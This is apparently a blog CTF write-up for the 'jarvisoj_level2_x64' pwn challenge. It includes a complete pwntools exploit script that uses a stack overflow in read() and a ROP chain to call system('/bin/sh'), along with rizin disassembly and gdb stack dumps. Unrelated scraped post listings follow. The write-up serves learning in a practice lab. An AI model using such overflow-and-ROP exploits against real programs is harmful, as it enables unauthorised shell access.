Here i finish the jarvisoj_level2_x64 1 challenge in buuctf and here is some writeup

(i use English to write this blog for protecting it from CSDN )

i will post my code here and explain it

code

from pwn import *

len = 128 + 8 # filling the stack also RBP

payload = b'a'*len 

evil_addr = 0x00000000004006b3 # pop rdi ret 

evil_addr1 = 0x00400603 # call sym.imp.system 

e = ELF("level2_x64")

sh_addr = 0x00600a90 

system_plt = e.plt['system']

payload += p64(evil_addr) + p64(sh_addr) + p64(evil_addr1)

p = process("./level2_x64")

#pause()

p.sendline(payload);

p.interactive()

Analyse the code

using rizin for static analyse and using gdb for dyn

> rizin level2_x64

[0x00400500]> iE

nth paddr      vaddr      bind   type   size lib name

---------------------------------------------------------------------

45  0x000006c0 0x004006c0 GLOBAL FUNC   2        __libc_csu_fini

48  ---------- 0x00600a98 GLOBAL NOTYPE 0        _edata

49  0x000006c4 0x004006c4 GLOBAL FUNC   0        _fini

51  0x000005f6 0x004005f6 GLOBAL FUNC   42       vulnerable_function

54  0x00000a80 0x00600a80 GLOBAL NOTYPE 0        __data_start

56  0x00000a88 0x00600a88 GLOBAL OBJ    0        __dso_handle

57  0x000006d0 0x004006d0 GLOBAL OBJ    4        _IO_stdin_used

58  0x00000650 0x00400650 GLOBAL FUNC   101      __libc_csu_init

59  ---------- 0x00600aa0 GLOBAL NOTYPE 0        _end

60  0x00000500 0x00400500 GLOBAL FUNC   0        _start

61  ---------- 0x00600a98 GLOBAL NOTYPE 0        __bss_start

62  0x00000620 0x00400620 GLOBAL FUNC   37       main

63  0x00000a90 0x00600a90 GLOBAL OBJ    8        hint

65  ---------- 0x00600a98 GLOBAL OBJ    0        __TMC_END__

67  0x00000488 0x00400488 GLOBAL FUNC   0        _init

We will dive into main function and vulnerable_function

Let's try main first

also using rizin to decompile it here is the result

[0x00400620]> pdg

void main(int argc, char **argv)

{

    char **var_18h;

    int var_ch;

    sym.vulnerable_function();

    sym.imp.system("echo \'Hello World!\'");

    return;

}

Now go into the vulnerable_function for more details

void sym.vulnerable_function(void)

{

    void *buf;

    sym.imp.system("echo Input:");

    sym.imp.read(0, &buf, 0x200);

    return;

}

Something strange , notice the read funtion's so i will check the assemble code for more

[0x004005f6]> pdf

            ; CALL XREF from main @ 0x400634

┌ sym.vulnerable_function();

│           ; var void *buf @ stack - 0x88

│           0x004005f6      push  rbp

│           0x004005f7      mov   rbp, rsp

│           0x004005fa      add   rsp, 0xffffffffffffff80

│           0x004005fe      mov   edi, str.echo_Input:                 ; 0x4006d4 ; "echo Input:" ; const char *string

│           0x00400603      call  sym.imp.system                       ; sym.imp.system ; int system(const char *string)

│           0x00400608      lea   rax, [buf]

│           0x0040060c      mov   edx, 0x200                           ; 512 ; size_t nbyte

│           0x00400611      mov   rsi, rax                             ; void *buf

│           0x00400614      mov   edi, 0                               ; int fildes

│           0x00400619      call  sym.imp.read                         ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)

│           0x0040061e      leave

└           0x0040061f      ret

now, the read function's distinct address is pointer into the [buf] which is about locate in stack

here is recive the 0x200 bytes it may be much more larger for the stack , and there is also without canary protection so we can dive into stack overflow via read function

dyn debug

we use gdb for dyn debug to found the exactly number of payload of stack overflow

> gdb vulnerable_function

> c

(gdb) disassemble

Dump of assembler code for function vulnerable_function:

   0x00000000004005f6 <+0>:	push   %rbp

   0x00000000004005f7 <+1>:	mov    %rsp,%rbp

=> 0x00000000004005fa <+4>:	add    $0xffffffffffffff80,%rsp

   0x00000000004005fe <+8>:	mov    $0x4006d4,%edi

   0x0000000000400603 <+13>:	call   0x4004c0 <system@plt>

   0x0000000000400608 <+18>:	lea    -0x80(%rbp),%rax

   0x000000000040060c <+22>:	mov    $0x200,%edx

   0x0000000000400611 <+27>:	mov    %rax,%rsi

   0x0000000000400614 <+30>:	mov    $0x0,%edi

   0x0000000000400619 <+35>:	call   0x4004d0 <read@plt>

   0x000000000040061e <+40>:	leave

   0x000000000040061f <+41>:	ret

End of assembler dump.

(gdb) b *vulnerable_function+40

(gdb) c

Continuing.

[Detaching after vfork from child process 730797]

Input:

AAAAAAAA

now we input 8 A into stack let's check where are they so that calculate the exactly length

gdb) x/64wx $rsp

0x7fffffffe3b0:	0x41414141	0x41414141	0x0000080a	0x00000000

0x7fffffffe3c0:	0x00000002	0x00000000	0x00000006	0x80000000

0x7fffffffe3d0:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe3e0:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe3f0:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe400:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe410:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe420:	0x00000000	0x00000000	0x00000000	0x00000000

0x7fffffffe430:	0xffffe450	0x00007fff	0x00400639	0x00000000

0x7fffffffe440:	0xffffe578	0x00007fff	0xffffe578	0x00000001

0x7fffffffe450:	0xffffe4f0	0x00007fff	0xf7db7e08	0x00007fff

0x7fffffffe460:	0xffffe4a0	0x00007fff	0xffffe578	0x00007fff

0x7fffffffe470:	0x00400040	0x00000001	0x00400620	0x00000000

0x7fffffffe480:	0xffffe578	0x00007fff	0x2ef7ab9e	0x5b0c92b4

0x7fffffffe490:	0x00000001	0x00000000	0x00000000	0x00000000

0x7fffffffe4a0:	0xf7ffd000	0x00007fff	0x00000000	0x00000000

(gdb) p $rbp

$1 = (void *) 0x7fffffffe430

it is obvious that we just need the length about |0x7fffffffe3b0-0x7fffffffe430| + 8

(just explain why you need add 8 : because we just calculate the length from rsp low address into rbp low address , but we need length from rsp low address into rbp high address , so we add 8 for x64 arch machine)

now,we just exploit the vulnerable_function , and we can controller the program to execute any code locate in the program

But what we wanna is get a bash shell or something can execute command

we have two choices

I. allocate a memory and write shellcode into it then go to execute it

II. go to somewhere and change args to get our target

For I , it is hard to do this,cause we just can go to any where ,we could not actually allocate memory and write something into it(maybe we can using a brunch of pop|ret command and go to libc to allocate memory which need more details about the program)

For II ,it is much easier,Attention ,there is something special for us

do you remember the first output

[0x00400500]> iE

nth paddr      vaddr      bind   type   size lib name

---------------------------------------------------------------------

45  0x000006c0 0x004006c0 GLOBAL FUNC   2        __libc_csu_fini

48  ---------- 0x00600a98 GLOBAL NOTYPE 0        _edata

49  0x000006c4 0x004006c4 GLOBAL FUNC   0        _fini

51  0x000005f6 0x004005f6 GLOBAL FUNC   42       vulnerable_function

54  0x00000a80 0x00600a80 GLOBAL NOTYPE 0        __data_start

56  0x00000a88 0x00600a88 GLOBAL OBJ    0        __dso_handle

57  0x000006d0 0x004006d0 GLOBAL OBJ    4        _IO_stdin_used

58  0x00000650 0x00400650 GLOBAL FUNC   101      __libc_csu_init

59  ---------- 0x00600aa0 GLOBAL NOTYPE 0        _end

60  0x00000500 0x00400500 GLOBAL FUNC   0        _start

61  ---------- 0x00600a98 GLOBAL NOTYPE 0        __bss_start

62  0x00000620 0x00400620 GLOBAL FUNC   37       main

63  0x00000a90 0x00600a90 GLOBAL OBJ    8        hint

65  ---------- 0x00600a98 GLOBAL OBJ    0        __TMC_END__

67  0x00000488 0x00400488 GLOBAL FUNC   0        _init

there is a hint in 0x00600a90 address

let check what it is

[0x00400500]> px @ 0x00600a90

- offset -   0 1  2 3  4 5  6 7  8 9  A B  C D  E F  0123456789ABCDEF

0x00600a90  2f62 696e 2f73 6800 0000 0000 0000 0000  /bin/sh.........

0x00600aa0  ffff ffff ffff ffff 0000 0000 0000 0000  ................

0x00600ab0  0000 0000 0000 0000 0000 0000 0000 0000  ................

0x00600ac0  0000 0000 0000 0000 0000 0000 0000 0000  ................

0x00600ad0  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600ae0  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600af0  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b00  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b10  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b20  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b30  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b40  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b50  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b60  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b70  ffff ffff ffff ffff ffff ffff ffff ffff  ................

0x00600b80  ffff ffff ffff ffff ffff ffff ffff ffff  ................

it is a string contains '/bin/sh' which can be a args for system to spawn a bash shell

ok ,now find the system function ,we just need assembly code like "call systemm;"

We almost win the game!

Firsh we need found the assemble code "call system"

before we go to here we need replace the original argvs with '/bin/sh'

is it similar ,yeah , we had seen it in vulnerable_function

[0x004005f6]> pdf

            ; CALL XREF from main @ 0x400634

┌ sym.vulnerable_function();

│           ; var void *buf @ stack - 0x88

│           0x004005f6      push  rbp

│           0x004005f7      mov   rbp, rsp

│           0x004005fa      add   rsp, 0xffffffffffffff80

│           0x004005fe      mov   edi, str.echo_Input:                 ; 0x4006d4 ; "echo Input:" ; const char *string

│           0x00400603      call  sym.imp.system                       ; sym.imp.system ; int system(const char *string)

│           0x00400608      lea   rax, [buf]

│           0x0040060c      mov   edx, 0x200                           ; 512 ; size_t nbyte

│           0x00400611      mov   rsi, rax                             ; void *buf

│           0x00400614      mov   edi, 0                               ; int fildes

│           0x00400619      call  sym.imp.read                         ; sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)

│           0x0040061e      leave

└           0x0040061f      ret

now the can go to 0x00400603 with edi pointer '/bin/sh'

ROP

if you do not understand what ROP is, just go to learn it and come back continue

⋊> ~/solve ROPgadget --binary level2_x64 --only "pop|ret" |grep rdi                                                                                                                                        10:29:20

0x00000000004006b3 : pop rdi ; ret

so we got one gadget ,it is enough

we got the flag !

Here is what stack is after we send payload

(gdb) x/64wx $rsp

rsp-> 0x7ffc0a0ce240:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce250:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce260:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce270:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce280:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce290:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce2a0:	0x61616161	0x61616161	0x61616161	0x61616161

      0x7ffc0a0ce2b0:	0x61616161	0x61616161	0x61616161	0x61616161

rbp-> 0x7ffc0a0ce2c0:	0x61616161	0x61616161	0x004006b3	0x00000000 <- return address (pop rdi ;ret)

sh-> 0x7ffc0a0ce2d0:	0x00600a90	0x00000000	0x00400603	0x00000000  <-call system address

      0x7ffc0a0ce2e0:	0x0a0ce30a	0x00007ffc	0xd226fe08	0x00007897

      0x7ffc0a0ce2f0:	0x0a0ce330	0x00007ffc	0x0a0ce408	0x00007ffc

      0x7ffc0a0ce300:	0x00400040	0x00000001	0x00400620	0x00000000

      0x7ffc0a0ce310:	0x0a0ce408	0x00007ffc	0xd585d4a1	0x05f8e39e

      0x7ffc0a0ce320:	0x00000001	0x00000000	0x00000000	0x00000000

      0x7ffc0a0ce330:	0xd24b5000	0x00007897	0x00000000	0x00000000

it will return to address 0x4006b3 which contains assemble code "pop rdi;ret"

now it execute pop rdi which pop the next address into rdi , yeah it is sh_address

then execute ret command again , which is equ "pop rip" ,so it return to "call system"

Finally you got the bash shell

Thanks for viewing

jarvisoj_level2_x64 1 writeup and blog的更多相关文章

  1. xss练习平台及writeup

    今天玩了一天的xss. 分享几个xss game https://xss.haozi.me/#/0x00 http://47.94.13.75/test/  writeup:http://www.cn ...

  2. 2016第七季极客大挑战Writeup

    第一次接触CTF,只会做杂项和一点点Web题--因为时间比较仓促,写的比较简略.以后再写下工具使用什么的. 纯新手,啥都不会.处于瑟瑟发抖的状态. 一.MISC 1.签到题 直接填入题目所给的SYC{ ...

  3. ISCC2016 WriteUp

    日期: 2016-05-01~ 注:隔了好久才发布这篇文章,还有两道Pwn的题没放,过一阵子放上.刚开始做这个题,后来恰巧赶上校内CTF比赛,就把重心放在了那个上面. 这是第一次做类似于CTF的题,在 ...

  4. 参加 Tokyo Westerns / MMA CTF 2nd 2016 经验与感悟 TWCTF 2016 WriteUp

    洒家近期参加了 Tokyo Westerns / MMA CTF 2nd 2016(TWCTF) 比赛,不得不说国际赛的玩法比国内赛更有玩头,有的题给洒家一种一看就知道怎么做,但是做出来还需要洒家拍一 ...

  5. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  6. NCTF2018 Easy_Audit的writeup

    题目直接给出来代码 这题考几个点: 1.$_REQUEST的变量覆盖 2.编码绕过 3.PHP数组特性 4.正则绕过 5.file_get_contents函数 首先一步步把题目分析一遍 if($_R ...

  7. ctf题目writeup(1)

    2019/1/28 题目来源:爱春秋 https://www.ichunqiu.com/battalion?t=1 1. 该文件是一个音频文件: 首先打开听了一下,有短促的长的....刚开始以为是摩斯 ...

  8. 2019年领航杯 江苏省网络信息安全竞赛 初赛部分writeup

    赛题已上传,下载连接:https://github.com/raddyfiy/2019linghangcup 做出了全部的misc和前三道逆向题,排名第10,暂且贴一下writeup. 关卡一 编码解 ...

  9. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  10. 31C3 CTF web关writeup

    0x00 背景 31c3 CTF 还是很人性化的,比赛结束了之后还可以玩.看题解做出了当时不会做的题目,写了一个writeup. 英文的题解可以看这:https://github.com/ctfs/w ...

随机推荐

  1. 如何快速在 Apache DolphinScheduler 新扩展一个任务插件?

    作者 | 代立冬 编辑 | Debra Chen Apache DolphinScheduler 是现代数据工作流编排平台,具有非常强大的可视化能力,DolphinScheduler 致力于使数据工程 ...

  2. Python 提取出SQL语句中Where的值的方法

    1.方法一:使用sqlparse库的方法 为了提取SQL语句中WHERE子句的值,我们可以利用Python的sqlparse库,这是一个专门用于解析SQL语句的库.以下是一个示例代码,演示如何使用sq ...

  3. bat2exe

    https://blog.csdn.net/qq_23452385/article/details/109145151

  4. Win32 处理多个按钮共用一个事件消息

    今天在学习制作计算器小程序中,碰到要多个按钮共用一个事件的问题, 现记录下来. 在窗体上按钮排列 排列的时候要按顺序排放,也就是说,0-9的ID号要连着的. #define IDD_DIALOG1 1 ...

  5. Devexpress GridView 单元格输入检验

    实现效果 打开设计器 找到CellValueChanged事件 编写代码 private void gvmain_CellValueChanged(object sender, DevExpress. ...

  6. 编译 Qt 项目

    参考:Qt 编程指南 一个最小化工作示例:qt-minimal | GitHub 源文件 main.cpp #include <QApplication> #include <QLa ...

  7. LaTeX 交叉引用的四次编译

    编译包含交叉引用的 LaTeX 文件需要编译四次(pdflatex + bibtex + pdflatex * 2),一直对这四次编译都干了什么事很好奇.这次就来看一下每一步具体都干了些什么. 源文件 ...

  8. C语言输出格式工整的日历——2乘6样式(详见本文)

    本篇博客有更新!!!更新后效果图如下: 文章末尾的完整代码如不能在Dev-C++上完好运行,出现如下问题: E:\Dev-Cpp\源代码\万年历.c [Error] 'for' loop initia ...

  9. 【Azure Developer】上手 The Best AI Code "Cursor" : 仅仅7次对话,制作个人页面原型,效果让人惊叹!

    AI Code 时代早已开启,自己才行动.上手一试,让人惊叹.借助这感叹的情绪,把今天操作Cursor的步骤记录下来,也分享给大家. 推荐大家上手一试,让你改变! 准备阶段 下载 Cursor(htt ...

  10. JS常见的API扩展形式(prototype、jquery、vue插件封装)以及怎样设计出易扩展的表单验证功能?

    常见的API扩展形式 prototype 比如我现在有一个需求,给定一个字符串,给方法传递一个参数为数字类型来确定当前字符串重复次数,例如: 'abc'.repeatStringNumTimes(3) ...